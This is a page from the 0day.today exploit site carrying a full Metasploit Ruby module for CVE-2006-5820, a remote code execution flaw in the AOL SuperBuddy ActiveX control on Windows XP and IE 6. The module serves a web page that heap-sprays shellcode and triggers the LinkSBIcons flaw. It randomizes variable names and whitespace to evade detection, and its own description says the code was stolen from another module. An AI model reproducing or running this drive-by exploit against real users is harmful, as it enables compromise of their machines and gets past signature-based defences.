0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AOL SuperBuddy ActiveX Control Remote Code Execution Exploit (meta)
[===================================================================
AOL SuperBuddy ActiveX Control Remote Code Execution Exploit (meta)
===================================================================
require 'msf/core'
module Msf
class Exploits::Windows::Browser::AOL_SuperBuddy_LinkSBIcons < Msf::Exploit::Remote
include Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'AOL Sb.Superbuddy vulnerability',
'Description' => %q{
This module exploits a flaw in AOL Sb.SuperBuddy. We stole this code from a pre-existing metasploit module.
},
'License' => MSF_LICENSE,
'Author' =>
[
'kradchad',
'leetpete'
],
'Version' => '0.1',
'References' =>
[
[ 'CVE', 'CVE-2006-5820']
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
],
'DefaultTarget' => 0))
end
def autofilter
false
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Get a unicode friendly version of the return address
addr_word = [target.ret].pack('V').unpack('H*')[0][0,4]
# Randomize the javascript variable names
var_buffer = rand_text_alpha(rand(30)+2)
var_shellcode = rand_text_alpha(rand(30)+2)
var_unescape = rand_text_alpha(rand(30)+2)
var_x = rand_text_alpha(rand(30)+2)
var_i = rand_text_alpha(rand(30)+2)
var_tic = rand_text_alpha(rand(30)+2)
var_toc = rand_text_alpha(rand(30)+2)
# Randomize HTML data
html = rand_text_alpha(rand(30)+2)
# Build out the message
content = %Q|
<html>
<head>
<script>
try {
var #{var_unescape} = unescape ;
var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;
var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;
while (#{var_buffer}.length <= 0x100000) #{var_buffer}+=#{var_buffer} ;
var #{var_x} = new Array() ;
for ( var #{var_i} =0 ; #{var_i} < 120 ; #{var_i}++ ) {
#{var_x}[ #{var_i} ] =
#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;
}
var #{var_tic} = new ActiveXObject( 'Sb.SuperBuddy.1' );
try { #{var_tic}.LinkSBIcons( #{target.ret} ) ; } catch( e ) { }
} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
<body>
#{html}
</body>
</html>
|
# Randomize the whitespace in the document
content.gsub!(/\s+/) do |s|
len = rand(100)+2
set = "\x09\x20\x0d\x0a"
buf = ''
while (buf.length < len)
buf << set[rand(set.length)].chr
end
buf
end
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
end
end
end
# 0day.today [2024-11-15] #